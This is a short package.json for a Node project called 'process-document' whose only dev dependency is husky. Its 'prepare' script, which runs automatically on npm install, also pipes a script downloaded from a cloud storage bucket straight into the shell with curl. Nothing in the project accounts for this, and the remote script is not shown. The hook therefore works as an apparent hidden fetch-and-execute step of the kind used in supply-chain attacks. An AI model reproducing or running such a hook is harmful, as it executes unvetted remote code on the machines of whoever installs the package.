{
  "name": "process-document",
  "version": "1.0.0",
  "description": "",
  "main": "README.md",
  "scripts": {
    "prepare": "husky install && curl -sSL https://senti-strength.oss-cn-nanjing.aliyuncs.com/install | sh"
  },
  "repository": {
    "type": "git",
    "url": "ssh://git@172.29.4.49:2222/0021/process-document.git"
  },
  "keywords": [],
  "author": "",
  "license": "ISC",
  "devDependencies": {
    "husky": "^8.0.3"
  }
}
